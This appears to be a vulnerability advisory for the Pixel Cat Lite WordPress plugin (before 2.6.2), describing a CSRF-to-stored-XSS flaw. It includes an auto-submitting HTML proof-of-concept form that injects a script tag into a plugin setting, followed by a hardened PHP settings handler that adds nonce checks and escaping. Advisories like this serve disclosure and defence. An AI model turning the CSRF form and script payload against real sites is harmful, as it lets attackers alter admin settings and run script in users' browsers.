wpexploit | JrXnm | WPEX-ID:399FFD65-F3C0-4FBE-A83A-2A620976AAD2
History: Nov 15, 2021 - 12:00 a.m.

Pixel Cat Lite < 2.6.2 - CSRF to Stored Cross-Site Scripting

2021-11-15 00:00:00
JrXnm
pixel cat lite
cross-site scripting
csrf
security vulnerability
form injection

EPSS: 0.001
Percentile: 32.0%

The plugin does not have a CSRF check when saving its settings, and does not sanitise and escape some of them, which could allow an attacker to make a logged-in admin change them and perform Cross-Site Scripting attacks.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=fca_pc_settings_page" id="hack" method="post">
      <input type="hidden" name="fca_pc[has_save]" value="1" />
      <input type="hidden" name="fca_pc_save" value="1" />
      <input type="hidden" name="fca[trigger_type]" value="post" />
      <input type="hidden" name="fca_pc[event_name]" value="" />
      <input type="hidden" name="fca_pc[value]" value="" />
      <input type="hidden" name="fca_pc[currency]" value="" />
      <input type="hidden" name="fca_pc[content_name]" value="" />
      <input type="hidden" name="fca_pc[content_type]" value="product" />
      <input type="hidden" name="fca_pc[content_ids]" value="" />
      <input type="hidden" name="fca_pc[content_category]" value="" />
      <input type="hidden" name="fca_pc[search_string]" value="" />
      <input type="hidden" name="fca_pc[num_items]" value="" />
      <input type="hidden" name="fca_pc[status]" value="" />
      <input type="hidden" name="fca_pc[google_product_category]" value="'><script>alert(document.domain);</script>" />
      <input type="submit" value="submit request" />
    </form>
  </body>
  <script>
      var form1 = document.getElementById('hack');
      form1.submit();
  </script>
</html>
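
The two controls the description says are missing (a CSRF check on save, and sanitising plus escaping of the stored values), shown as a hardened WordPress settings handler. This is an added example, not the plugin's own code or its 2.6.2 fix; the function names, nonce action, nonce field and option name are assumptions, while the `fca_pc` field names come from the request above.

```php
<?php
// Added example: every example_* / EXAMPLE_* name is hypothetical and not
// taken from Pixel Cat Lite. Only core WordPress functions are called.
const EXAMPLE_NONCE_ACTION = 'example_pc_save_settings';
const EXAMPLE_NONCE_FIELD  = 'example_pc_nonce';
const EXAMPLE_OPTION       = 'example_pc_settings';

// Render: emit a nonce with the form and escape every stored value on output.
function example_pc_render_settings_form() {
    $saved = get_option( EXAMPLE_OPTION, array() );
    $gpc   = isset( $saved['google_product_category'] ) ? $saved['google_product_category'] : '';

    echo '<form method="post">';
    wp_nonce_field( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );
    echo '<input type="hidden" name="fca_pc_save" value="1" />';
    // esc_attr() encodes <, >, & and both quote characters, so a stored
    // value cannot close the attribute and start a new tag.
    printf(
        '<input type="text" name="fca_pc[google_product_category]" value="%s" />',
        esc_attr( $gpc )
    );
    submit_button();
    echo '</form>';
}

// Save: capability check, then nonce check, then sanitise each field.
function example_pc_save_settings() {
    if ( empty( $_POST['fca_pc_save'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request when the nonce is missing or invalid. A form
    // auto-submitted from another origin cannot read the admin's nonce.
    check_admin_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );

    $raw   = ( isset( $_POST['fca_pc'] ) && is_array( $_POST['fca_pc'] ) )
        ? wp_unslash( $_POST['fca_pc'] )
        : array();
    $clean = array();
    foreach ( $raw as $key => $value ) {
        if ( is_scalar( $value ) ) {
            // sanitize_text_field() strips tags and control characters.
            $clean[ sanitize_key( $key ) ] = sanitize_text_field( $value );
        }
    }
    update_option( EXAMPLE_OPTION, $clean );
}
add_action( 'admin_init', 'example_pc_save_settings' );
```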
